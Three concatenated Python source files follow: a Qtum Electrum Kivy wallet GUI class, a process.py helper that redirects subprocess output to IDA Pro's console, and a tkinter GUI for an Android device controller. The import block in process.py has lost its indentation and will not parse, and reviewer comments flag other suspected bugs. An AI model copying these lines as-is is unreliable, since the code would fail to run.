        return format_satoshis_plain(satoshis, self.decimal_point())

    def get_amount(self, amount_str):
        """Parse '<number> <unit>' into satoshis; None if the number is invalid."""
        a, u = amount_str.split()
        assert u == self.base_unit
        try:
            x = Decimal(a)
        except:
            return None
        p = pow(10, self.decimal_point())
        return int(p * x)

    _orientation = OptionProperty('landscape',
                                  options=('landscape', 'portrait'))

    def _get_orientation(self):
        return self._orientation

    orientation = AliasProperty(_get_orientation,
                                None,
                                bind=('_orientation',))
    '''Current screen orientation, derived from the window size.

    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''

    _ui_mode = OptionProperty('phone', options=('tablet', 'phone'))

    def _get_ui_mode(self):
        return self._ui_mode

    ui_mode = AliasProperty(_get_ui_mode,
                            None,
                            bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.

    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''

    def __init__(self, **kwargs):
        # initialize variables
        self._clipboard = Clipboard
        self.info_bubble = None
        self.nfcscanner = None
        self.tabs = None
        self.is_exit = False
        self.wallet = None

        App.__init__(self)#, **kwargs)

        # NOTE(review): `title` is a plain local here, so it never reaches the
        # App; probably meant `self.title` — confirm before changing.
        title = _('Qtum Electrum App')
        self.electrum_config = config = kwargs.get('config', None)
        self.language = config.get('language', 'en')
        self.network = network = kwargs.get('network', None)
        if self.network:
            self.num_blocks = self.network.get_local_height()
            self.num_nodes = len(self.network.get_interfaces())
            host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
            self.server_host = host
            self.server_port = port
            self.auto_connect = auto_connect
            self.proxy_config = proxy_config if proxy_config else {}

        self.plugins = kwargs.get('plugins', [])
        self.gui_object = kwargs.get('gui_object', None)
        self.daemon = self.gui_object.daemon
        self.fx = self.daemon.fx
        self.use_rbf = config.get('use_rbf', False)
        self.use_change = config.get('use_change', True)
        self.use_unconfirmed = not config.get('confirmed_only', False)

        # create triggers so as to minimize updation a max of 2 times a sec
        self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
        self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
        self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
        self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
        # cached dialogs
        self._settings_dialog = None
        self._password_dialog = None

    def wallet_name(self):
        return os.path.basename(self.wallet.storage.path) if self.wallet else ' '

    def on_pr(self, pr):
        """Handle an incoming payment request: verify, store, then show or reject."""
        if pr.verify(self.wallet.contacts):
            key = self.wallet.invoices.add(pr)
            if self.invoices_screen:
                self.invoices_screen.update()
            status = self.wallet.invoices.get_status(key)
            if status == PR_PAID:
                self.show_error("invoice already paid")
                self.send_screen.do_clear()
            else:
                if pr.has_expired():
                    self.show_error(_('Payment request has expired'))
                else:
                    self.switch_to('send')
                    self.send_screen.set_request(pr)
        else:
            self.show_error("invoice error:" + pr.error)
            self.send_screen.do_clear()

    def on_qr(self, data):
        """Dispatch scanned QR data: address, URI, or raw transaction."""
        from qtum_electrum.bitcoin import base_decode, is_address
        data = data.strip()
        if is_address(data):
            self.set_URI(data)
            return
        if data.startswith('qtum:'):
            self.set_URI(data)
            return
        # try to decode transaction
        from qtum_electrum.transaction import Transaction
        from qtum_electrum.util import bh2u
        try:
            text = bh2u(base_decode(data, None, base=43))
            tx = Transaction(text)
            tx.deserialize()
        except:
            tx = None
        if tx:
            self.tx_dialog(tx)
            return
        # show error
        self.show_error("Unable to decode QR data")

    def update_tab(self, name):
        s = getattr(self, name + '_screen', None)
        if s:
            s.update()

    @profiler
    def update_tabs(self):
        for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
            self.update_tab(tab)

    def switch_to(self, name):
        """Activate the named tab, lazily loading its screen on first use."""
        s = getattr(self, name + '_screen', None)
        if s is None:
            s = self.tabs.ids[name + '_screen']
            s.load_screen()
        panel = self.tabs.ids.panel
        tab = self.tabs.ids[name + '_tab']
        panel.switch_to(tab)

    def show_request(self, addr):
        self.switch_to('receive')
        self.receive_screen.screen.address = addr

    def show_pr_details(self, req, status, is_invoice):
        """Populate and open the invoice/request detail popup from a req dict."""
        from qtum_electrum.util import format_time
        requestor = req.get('requestor')
        exp = req.get('exp')
        memo = req.get('memo')
        amount = req.get('amount')
        popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
        popup.is_invoice = is_invoice
        popup.amount = amount
        popup.requestor = requestor if is_invoice else req.get('address')
        popup.exp = format_time(exp) if exp else ''
        popup.description = memo if memo else ''
        popup.signature = req.get('signature', '')
        popup.status = status
        txid = req.get('txid')
        popup.tx_hash = txid or ''
        popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
        popup.open()

    def qr_dialog(self, title, data, show_text=False):
        from .uix.dialogs.qr_dialog import QRDialog
        popup = QRDialog(title, data, show_text)
        popup.open()

    def scan_qr(self, on_complete):
        """Launch the external ZXing barcode scanner app (Android only)."""
        if platform != 'android':
            return
        from jnius import autoclass
        from android import activity
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        Intent = autoclass('android.content.Intent')
        intent = Intent("com.google.zxing.client.android.SCAN")
        intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
        def on_qr_result(requestCode, resultCode, intent):
            if requestCode == 0:
                if resultCode == -1:  # RESULT_OK:
                    contents = intent.getStringExtra("SCAN_RESULT")
                    if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
                        on_complete(contents)
                    else:
                        self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
        activity.bind(on_activity_result=on_qr_result)
        try:
            PythonActivity.mActivity.startActivityForResult(intent, 0)
        except:
            self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))

    def scan_qr_zxing(self, on_complete):
        # uses zxing embedded lib
        if platform != 'android':
            return
        from jnius import autoclass
        from android import activity
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
        integrator = IntentIntegrator(PythonActivity.mActivity)
        def on_qr_result(requestCode, resultCode, intent):
            if requestCode == 0:
                if resultCode == -1:  # RESULT_OK:
                    contents = intent.getStringExtra("SCAN_RESULT")
                    if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
                        on_complete(contents)
                    else:
                        self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
        activity.bind(on_activity_result=on_qr_result)
        integrator.initiateScan()

    def do_share(self, data, title):
        """Open the Android share sheet with *data* as plain text."""
        if platform != 'android':
            return
        from jnius import autoclass, cast
        JS = autoclass('java.lang.String')
        Intent = autoclass('android.content.Intent')
        sendIntent = Intent()
        sendIntent.setAction(Intent.ACTION_SEND)
        sendIntent.setType("text/plain")
        sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
        it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
        currentActivity.startActivity(it)

    def build(self):
        return Builder.load_file('gui/kivy/main.kv')

    def _pause(self):
        if platform == 'android':
            # move activity to back
            from jnius import autoclass
            python_act = autoclass('org.kivy.android.PythonActivity')
            mActivity = python_act.mActivity
            mActivity.moveTaskToBack(True)

    def on_start(self):
        ''' This is the start point of the kivy ui
        '''
        import time
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
        win = Window
        win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
        win.bind(on_key_down=self.on_key_down)
        #win.softinput_mode = 'below_target'
        self.on_size(win, win.size)
        self.init_ui()
        self.load_wallet_by_name(self.electrum_config.get_wallet_path())
        # init plugins
        run_hook('init_kivy', self)
        # fiat currency
        self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
        # default tab
        self.switch_to('history')
        # bind intent for bitcoin: URI scheme
        if platform == 'android':
            from android import activity
            from jnius import autoclass
            PythonActivity = autoclass('org.kivy.android.PythonActivity')
            mactivity = PythonActivity.mActivity
            self.on_new_intent(mactivity.getIntent())
            activity.bind(on_new_intent=self.on_new_intent)
        # connect callbacks
        if self.network:
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'status', 'new_transaction', 'verified']
            self.network.register_callback(self.on_network_event, interests)
            self.network.register_callback(self.on_quotes, ['on_quotes'])
            self.network.register_callback(self.on_history, ['on_history'])
        # URI passed in config
        uri = self.electrum_config.get('url')
        if uri:
            self.set_URI(uri)

    def get_wallet_path(self):
        if self.wallet:
            return self.wallet.storage.path
        else:
            return ''

    def on_wizard_complete(self, instance, wallet):
        if wallet:
            wallet.start_threads(self.daemon.network)
            self.daemon.add_wallet(wallet)
            self.load_wallet(wallet)
            self.on_resume()

    def load_wallet_by_name(self, path):
        """Load the wallet at *path*, or launch the install wizard if absent."""
        if not path:
            return
        wallet = self.daemon.load_wallet(path, None)
        if wallet:
            if wallet != self.wallet:
                self.stop_wallet()
                self.load_wallet(wallet)
                self.on_resume()
        else:
            Logger.debug('Electrum: Wallet not found. Launching install wizard')
            storage = WalletStorage(path)
            wizard = Factory.InstallWizard(self.electrum_config, storage)
            wizard.bind(on_wizard_complete=self.on_wizard_complete)
            action = wizard.storage.get_action()
            wizard.run(action)

    def on_stop(self):
        self.stop_wallet()

    def stop_wallet(self):
        if self.wallet:
            self.daemon.stop_wallet(self.wallet.storage.path)
            self.wallet = None

    def on_key_down(self, instance, key, keycode, codepoint, modifiers):
        if 'ctrl' in modifiers:
            # q=24 w=25
            if keycode in (24, 25):
                self.stop()
            elif keycode == 27:
                # r=27
                # force update wallet
                self.update_wallet()
            elif keycode == 112:
                # pageup
                #TODO move to next tab
                pass
            elif keycode == 117:
                # pagedown
                #TODO move to prev tab
                pass
        #TODO: alt+tab_number to activate the particular tab

    def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
        # back button: require a second press to exit
        if key == 27 and self.is_exit is False:
            self.is_exit = True
            self.show_info(_('Press again to exit'))
            return True
        # override settings button
        if key in (319, 282): #f1/settings button on android
            #self.gui.main_gui.toggle_settings(self)
            return True

    def settings_dialog(self):
        from .uix.dialogs.settings import SettingsDialog
        if self._settings_dialog is None:
            self._settings_dialog = SettingsDialog(self)
        self._settings_dialog.update()
        self._settings_dialog.open()

    def popup_dialog(self, name):
        """Open a named dialog; unknown names fall back to a kv-file popup."""
        if name == 'settings':
            self.settings_dialog()
        elif name == 'wallets':
            from .uix.dialogs.wallets import WalletDialog
            d = WalletDialog()
            d.open()
        else:
            popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
            popup.open()

    @profiler
    def init_ui(self):
        ''' Initialize The Ux part of qtum_electrum. This function performs the basic
        tasks of setting up the ui.
        '''
        #from weakref import ref

        self.funds_error = False
        # setup UX
        self.screens = {}

        #setup lazy imports for mainscreen
        Factory.register('AnimatedPopup',
                         module='qtum_electrum.gui.kivy.uix.dialogs')
        Factory.register('QRCodeWidget',
                         module='qtum_electrum.gui.kivy.uix.qrcodewidget')

        # preload widgets. Remove this if you want to load the widgets on demand
        #Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
        #Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())

        # load and focus the ui
        self.root.manager = self.root.ids['manager']

        self.history_screen = None
        self.contacts_screen = None
        self.send_screen = None
        self.invoices_screen = None
        self.receive_screen = None
        self.requests_screen = None
        self.icon = "icons/electrum.png"
        self.tabs = self.root.ids['tabs']

    def update_interfaces(self, dt):
        # mirror network topology into the Kivy properties shown in the UI
        self.num_nodes = len(self.network.get_interfaces())
        self.num_chains = len(self.network.get_blockchains())
        chain = self.network.blockchain()
        self.blockchain_checkpoint = chain.get_forkpoint()
        self.blockchain_name = chain.get_name()
        if self.network.interface:
            self.server_host = self.network.interface.host

    def on_network_event(self, event, *args):
        """Route network callbacks onto the rate-limited Clock triggers."""
        print('on_network_event', event)
        Logger.info('network event: '+ event)
        if event == 'network_updated':
            self._trigger_update_interfaces()
            self._trigger_update_status()
        elif event == 'wallet_updated':
            self._trigger_update_wallet()
            self._trigger_update_status()
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self._trigger_update_wallet()
        elif event == 'status':
            self._trigger_update_status()
        elif event == 'new_transaction':
            self._trigger_update_wallet()
        elif event == 'verified':
            self._trigger_update_wallet()

    @profiler
    def load_wallet(self, wallet):
        self.wallet = wallet
        self.update_wallet()
        # Once GUI has been initialized check if we want to announce something
        # since the callback has been called before the GUI was initialized
        if self.receive_screen:
            self.receive_screen.clear()
        self.update_tabs()
        run_hook('load_wallet', wallet, self)

    def update_status(self, *dt):
        """Recompute the status line (balance / sync state) shown in the UI."""
        self.num_blocks = self.network.get_local_height()
        if not self.wallet:
            self.status = _("No Wallet")
            return
        if self.network is None or not self.network.is_running():
            status = _("Offline")
        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            if not self.wallet.up_to_date or server_height == 0:
                status = _("Synchronizing...")
            elif server_lag > 1:
                status = _("Server lagging (%d blocks)"%server_lag)
            else:
                c, u, x = self.wallet.get_balance()
                text = self.format_amount(c+x+u)
                status = str(text.strip() + ' ' + self.base_unit)
        else:
            status = _("Disconnected")
        n = self.wallet.basename()
        self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
        #fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''

    def get_max_amount(self):
        """Return the spendable maximum for the current send address, formatted."""
        inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
        addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
        outputs = [(TYPE_ADDRESS, addr, '!')]
        tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
        amount = tx.output_value()
        return format_satoshis_plain(amount, self.decimal_point())

    def format_amount(self, x, is_diff=False, whitespaces=False):
        return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)

    def format_amount_and_units(self, x):
        return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit

    #@profiler
    def update_wallet(self, *dt):
        print('update_wallet')
        self._trigger_update_status()
        if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
            self.update_tabs()

    def notify(self, message):
        """Show a desktop/OS notification via plyer, if available."""
        try:
            global notification, os
            if not notification:
                from plyer import notification
            icon = (os.path.dirname(os.path.realpath(__file__))
                    + '/../../' + self.icon)
            notification.notify('Electrum', message,
                                app_icon=icon, app_name='Qtum Electrum')
        except ImportError:
            # NOTE(review): Logger.Error is likely a typo for Logger.error —
            # as written this line itself raises AttributeError; confirm.
            Logger.Error('Notification: needs plyer; `sudo pip install plyer`')

    def on_pause(self):
        # pause nfc
        if self.nfcscanner:
            self.nfcscanner.nfc_disable()
        return True

    def on_resume(self):
        if self.nfcscanner:
            self.nfcscanner.nfc_enable()
        # workaround p4a bug:
        # show an empty info bubble, to refresh the display
        self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)

    def on_size(self, instance, value):
        # derive orientation/ui_mode from the new window dimensions
        width, height = value
        self._orientation = 'landscape' if width > height else 'portrait'
        self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'

    def on_ref_label(self, label, touch):
        # first tap copies, second tap shows the QR code
        if label.touched:
            label.touched = False
            self.qr_dialog(label.name, label.data, True)
        else:
            label.touched = True
            self._clipboard.copy(label.data)
            Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))

    def set_send(self, address, amount, label, message):
        self.send_payment(address, amount=amount, label=label, message=message)

    def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
                   exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
                   modal=False):
        ''' Show a error Message Bubble.
        '''
        self.show_info_bubble( text=error, icon=icon, width=width,
            pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
            duration=duration, modal=modal)

    def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
                  exit=False, duration=0, modal=False):
        ''' Show a Info Message Bubble.
        '''
        self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
            duration=duration, modal=modal, exit=exit, pos=pos,
            arrow_pos=arrow_pos)

    def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
                         arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Method to show a Information Bubble

        .. parameters::
            text: Message to be displayed
            pos: position for the bubble
            duration: duration the bubble remains on screen. 0 = click to hide
            width: width of the Bubble
            arrow_pos: arrow position for the bubble
        '''
        info_bubble = self.info_bubble
        if not info_bubble:
            info_bubble = self.info_bubble = Factory.InfoBubble()
        win = Window
        if info_bubble.parent:
            win.remove_widget(info_bubble
                              if not info_bubble.modal else
                              info_bubble._modal_view)
        if not arrow_pos:
            info_bubble.show_arrow = False
        else:
            info_bubble.show_arrow = True
            info_bubble.arrow_pos = arrow_pos
        img = info_bubble.ids.img
        if text == 'texture':
            # icon holds a texture not a source image
            # display the texture in full screen
            text = ''
            img.texture = icon
            info_bubble.fs = True
            info_bubble.show_arrow = False
            img.allow_stretch = True
            info_bubble.dim_background = True
            info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
        else:
            info_bubble.fs = False
            info_bubble.icon = icon
            #if img.texture and img._coreimage:
            #    img.reload()
            img.allow_stretch = False
            info_bubble.dim_background = False
            info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
        info_bubble.message = text
        if not pos:
            pos = (win.center[0], win.center[1] - (info_bubble.height/2))
        info_bubble.show(pos, duration, width, modal=modal, exit=exit)

    def tx_dialog(self, tx):
        from .uix.dialogs.tx_dialog import TxDialog
        d = TxDialog(self, tx)
        d.open()

    def sign_tx(self, *args):
        # sign on a worker thread so the UI stays responsive
        threading.Thread(target=self._sign_tx, args=args).start()

    def _sign_tx(self, tx, password, on_success, on_failure):
        try:
            self.wallet.sign_transaction(tx, password)
        except InvalidPassword:
            Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
            return
        Clock.schedule_once(lambda dt: on_success(tx))

    def _broadcast_thread(self, tx, on_complete):
        ok, txid = self.network.broadcast_transaction(tx)
        Clock.schedule_once(lambda dt: on_complete(ok, txid))

    def broadcast(self, tx, pr=None):
        """Broadcast *tx*; if *pr* given, mark the invoice paid on success."""
        def on_complete(ok, msg):
            if ok:
                self.show_info(_('Payment sent.'))
                if self.send_screen:
                    self.send_screen.do_clear()
                if pr:
                    self.wallet.invoices.set_paid(pr, tx.txid())
                    self.wallet.invoices.save()
                    self.update_tab('invoices')
            else:
                self.show_error(msg)

        if self.network and self.network.is_connected():
            self.show_info(_('Sending'))
            threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
        else:
            self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))

    def description_dialog(self, screen):
        from .uix.dialogs.label_dialog import LabelDialog
        text = screen.message
        def callback(text):
            screen.message = text
        d = LabelDialog(_('Enter description'), text, callback)
        d.open()

    @profiler
    def amount_dialog(self, screen, show_max):
        from .uix.dialogs.amount_dialog import AmountDialog
        amount = screen.amount
        if amount:
            amount, u = str(amount).split()
            assert u == self.base_unit
        def cb(amount):
            screen.amount = amount
        popup = AmountDialog(show_max, amount, cb)
        popup.open()

    def protected(self, msg, f, args):
        # run f(*args, password) — asking for the PIN only when one is set
        if self.wallet.has_password():
            self.password_dialog(msg, f, args)
        else:
            f(*(args + (None,)))

    def delete_wallet(self):
        from .uix.dialogs.question import Question
        basename = os.path.basename(self.wallet.storage.path)
        d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
        d.open()

    def _delete_wallet(self, b):
        if b:
            basename = os.path.basename(self.wallet.storage.path)
            self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())

    def __delete_wallet(self, pw):
        """Verify the PIN, unlink the wallet file and load the default wallet."""
        wallet_path = self.get_wallet_path()
        dirname = os.path.dirname(wallet_path)
        basename = os.path.basename(wallet_path)
        if self.wallet.has_password():
            try:
                self.wallet.check_password(pw)
            except:
                self.show_error("Invalid PIN")
                return
        self.stop_wallet()
        os.unlink(wallet_path)
        self.show_error("Wallet removed:" + basename)
        d = os.listdir(dirname)
        name = 'default_wallet'
        new_path = os.path.join(dirname, name)
        self.load_wallet_by_name(new_path)

    def show_seed(self, label):
        self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))

    def _show_seed(self, label, password):
        if self.wallet.has_password() and password is None:
            return
        keystore = self.wallet.keystore
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except:
            self.show_error("Invalid PIN")
            return
        label.text = _('Seed') + ':\n' + seed
        if passphrase:
            label.text += '\n\n' + _('Passphrase') + ': ' + passphrase

    def change_password(self, cb):
        if self.wallet.has_password():
            self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
        else:
            self._change_password(cb, None)

    def _change_password(self, cb, old_password):
        # step 1: validate the old PIN, then ask for the new one
        if self.wallet.has_password():
            if old_password is None:
                return
            try:
                self.wallet.check_password(old_password)
            except InvalidPassword:
                self.show_error("Invalid PIN")
                return
        self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))

    def _change_password2(self, cb, old_password, new_password):
        # step 2: ask for confirmation of the new PIN
        self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))

    def _change_password3(self, cb, old_password, new_password, confirmed_password):
        # step 3: apply the change if both entries match
        if new_password == confirmed_password:
            self.wallet.update_password(old_password, new_password)
            cb()
        else:
            self.show_error("PIN numbers do not match")

    def password_dialog(self, msg, f, args):
        """Prompt for a PIN, then call f(*args, pin) shortly afterwards."""
        from .uix.dialogs.password_dialog import PasswordDialog
        def callback(pw):
            Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
        if self._password_dialog is None:
            self._password_dialog = PasswordDialog()
        self._password_dialog.init(msg, callback)
        self._password_dialog.open()
|
process.py | """
Both method redirects stdout to IDA Pro's console.
"""
from __future__ import print_function
import sys
import threading
import time
from subprocess import Popen as _Popen, PIPE, STDOUT
from PyQt5.QtCore import QCoreApplication
if sys.version_info.major == 3:
import queue as Queue
else:
import Queue
class Popen(_Popen):
    """
    Subclass of :py:meth:`subprocess.Popen` that
    if stdout is not given, it'll redirect stdout to messages window.
    """

    def __init__(self, *args, **kwargs):
        # Only take over the output when the caller did not redirect it
        # explicitly; otherwise behave exactly like subprocess.Popen.
        if 'stdout' not in kwargs:
            kwargs['stdout'] = PIPE
            if 'stderr' not in kwargs:
                # fold stderr into the same captured stream
                kwargs['stderr'] = STDOUT
            # `queue` carries bytes from the reader to the receiver thread;
            # `done` is an append-only list used as a cross-thread EOF flag.
            queue = Queue.Queue()
            done = []
            # Now launch the process
            super(Popen, self).__init__(*args, **kwargs)
            t_reader = threading.Thread(
                target=self._reader, args=(done, queue,))
            t_receiver = threading.Thread(
                target=self._receiver, args=(done, queue,))
            t_reader.start()
            t_receiver.start()
            # exposed so callers (see system()) can wait on the pump threads
            self.threads = t_reader, t_receiver
        else:
            # No need to do anything
            super(Popen, self).__init__(*args, **kwargs)

    @staticmethod
    def _receiver(done, queue):
        """Drain `queue` and write to stdout in batches (at most ~100/s)."""
        buff = []
        last_output_time = time.time()
        # prefer the binary buffer when stdout has one (Python 3 text stdout)
        stdout = getattr(sys.stdout, 'buffer', sys.stdout)
        while not (done and queue.empty()):
            cur_time = time.time()
            if last_output_time < cur_time - 0.01:
                # flush the accumulated bytes, stripping carriage returns
                stdout.write(b''.join(buff).replace(b'\r', b''))
                last_output_time = cur_time
                buff[:] = []
            try:
                item = queue.get(timeout=0.01)
            except Queue.Empty:
                continue
            buff.append(item)
            queue.task_done()
        # final flush after the reader signalled EOF
        stdout.write(b''.join(buff).replace(b'\r', b''))

    def _reader(self, done, queue):
        """Read the child's stdout byte-by-byte; flag `done` on EOF."""
        while True:
            byte = self.stdout.read(1)
            if not byte:
                done.append(True)
                break
            queue.put(byte)
def system(cmd):
    """
    Wrapper around :py:meth:`os.system`, except that output will be redirected to messages window.

    :param cmd: Command to execute.
    :return: exit status.
    :rtype: int
    """
    process = Popen(cmd, shell=True)
    # call processEvents() to prevent hang
    timeout = 0.01
    # `threads` only exists when Popen captured stdout itself
    threads = getattr(process, 'threads', ())
    # Wait until *every* pump thread has finished.  The original looped
    # `while all(...)`, which exits as soon as the FIRST thread dies, so the
    # receiver could still be flushing output after system() returned.
    while any(thread.is_alive() for thread in threads):
        for thread in threads:
            thread.join(timeout)
        QCoreApplication.processEvents()
    return process.wait()
if __name__ == '__main__':
    # smoke test: run pip through the redirected-console Popen and
    # print its exit status
    print(system('pip install requests'))
|
maingui.py | import sys, threading, time
import tkinter as tk
from PIL import Image, ImageTk
from androidcom import AndroidCOM
"""
GUI for AndroidCOM with tkinter
"""
class MainGUI(tk.Frame):
    """Tkinter front-end for :class:`AndroidCOM`.

    Shows a periodically refreshed device screenshot, a message area, and
    menu entries for toggling device settings (wifi, bluetooth, screen
    lock, brightness) and for printing status dictionaries to stdout.
    """

    def __init__(self, master=None):
        super().__init__(master)
        self.root = master
        self.ac = AndroidCOM()
        # Geometry and refresh intervals come from AndroidCOM's config file.
        self.total_width = self.ac.cfg['GUI'].getint('window_width')
        self.interval_image = self.ac.cfg['GUI'].getint('interval_image')    # ms between screenshot refreshes
        self.interval_status = self.ac.cfg['GUI'].getint('interval_status')  # ms between status re-syncs
        self.root.title("AndroidCOM")
        self.grid()
        self.createMsg()
        self.createImage()
        self.createMenu()

    def createMsg(self):
        # Message area shown above the screenshot.
        self.msgBox = tk.Message(self.root, width=self.total_width, text="")
        self.msgBox.grid(row=0,column=1,columnspan=3)

    def updateMsg(self,msg):
        # Replace the text currently shown in the message area.
        self.msgBox.configure(text=msg)

    def getImageTk(self):
        """Fetch a device screenshot and return it scaled to the window width."""
        im = Image.open(self.ac.getScreenshot())
        # Scale height proportionally to preserve the aspect ratio.
        wpercent = (self.total_width/float(im.size[0]))
        hsize = int((float(im.size[1])*float(wpercent)))
        # NOTE(review): Image.ANTIALIAS is deprecated and removed in
        # Pillow >= 10 (Image.LANCZOS is the replacement) — confirm the
        # pinned Pillow version before upgrading.
        im = im.resize((self.total_width, hsize), Image.ANTIALIAS)
        return ImageTk.PhotoImage(im)

    def createImage(self):
        self.ph = self.getImageTk()
        self.imageLbl = tk.Label(self.root,image=self.ph)
        # Keep a reference on the widget: tkinter does not hold one, and
        # the PhotoImage would otherwise be garbage-collected (blank image).
        self.imageLbl.image = self.ph
        self.imageLbl.grid(row=1,column=1,columnspan=3)
        if self.ac.cfg['GUI'].getboolean('autopull_image'):
            # Kick off the periodic screenshot refresh.
            self.root.after(self.interval_image, self.updateImage)

    def updateImage(self,repeat=True):
        self.ph = self.getImageTk()
        self.imageLbl.configure(image=self.ph)
        if repeat:
            # Re-schedule; the next fetch runs on a worker thread via cmd().
            self.root.after(self.interval_image, lambda:self.cmd(self.updateImage))

    def cmd(self,cmdtext):
        """Run *cmdtext* (a callable) on a daemon worker thread so slow
        device round-trips do not block the tkinter event loop."""
        t = threading.Thread(target=cmdtext,name="androidcom_thread")
        t.daemon = True
        t.start()

    def onClickWifi(self):
        # NOTE(review): `self.wifiVal` is a tk.BooleanVar object and is
        # always truthy — this likely should read `self.wifiVal.get()`.
        # Also appears unused: the wifi checkbutton is wired to toggleWifi
        # in createSettingsOptions instead. Confirm before removing.
        if self.wifiVal: self.cmd(self.ac.enableWifi)
        else: self.cmd(self.ac.disableWifi)

    def createMenu(self):
        """Build the menubar with the Settings and Status cascades."""
        self.menubar = tk.Menu(self.root)
        settingsmenu = tk.Menu(self.menubar, tearoff = 0)
        self.createSettingsOptions(settingsmenu)
        statusmenu = tk.Menu(self.menubar, tearoff = 0)
        self.createStatusOptions(statusmenu)
        self.menubar.add_cascade(label="Settings", menu=settingsmenu)
        self.menubar.add_cascade(label="Status", menu=statusmenu)
        self.root.config(menu=self.menubar)

    def toggleBrightness(self):
        # Checked -> medium brightness, unchecked -> low brightness.
        if self.brightVal.get(): self.cmd(self.ac.setBrightnessMedium)
        else: self.cmd(self.ac.setBrightnessLow)

    def createSettingsOptions(self,settingsmenu):
        """Add the toggle checkbuttons, seeded from current device status."""
        connStatus = self.ac.statusConnections()
        powerStatus = self.ac.statusPower()
        # Wifi-row
        self.wifiVal = tk.BooleanVar()
        self.wifiVal.set(connStatus['wifi_enabled'])
        settingsmenu.add_checkbutton(label="Wifi", variable=self.wifiVal, command=lambda:self.cmd(self.ac.toggleWifi), onvalue=True, offvalue=False)
        # Bluetooth-row
        self.blueVal = tk.BooleanVar()
        self.blueVal.set(connStatus['bluetooth_enabled'])
        settingsmenu.add_checkbutton(label="Bluetooth", variable=self.blueVal, command=lambda:self.cmd(self.ac.toggleBluetooth), onvalue=True, offvalue=False)
        # Lock/Unlock-row
        self.lockVal = tk.BooleanVar()
        self.lockVal.set(powerStatus['display_off'])
        settingsmenu.add_checkbutton(label="Locker", variable=self.lockVal, command=lambda:self.cmd(self.ac.toggleScreen), onvalue=True, offvalue=False)
        # Brightness-row
        self.brightVal = tk.BooleanVar()
        self.brightVal.set(False)
        settingsmenu.add_checkbutton(label="Brightness", variable=self.brightVal, command=self.toggleBrightness, onvalue=True, offvalue=False)
        # Start the periodic re-sync of the checkbutton values.
        self.root.after(self.interval_status, self.updateValues)

    def createStatusOptions(self,statusmenu):
        # Each entry dumps a status dictionary to stdout.
        statusmenu.add_command(label="Power", command=self.printPower)
        statusmenu.add_command(label="Connections", command=self.printConnections)
        statusmenu.add_command(label="Notifications", command=self.printNotifications)
        statusmenu.add_command(label="Windows", command=self.printWindows)

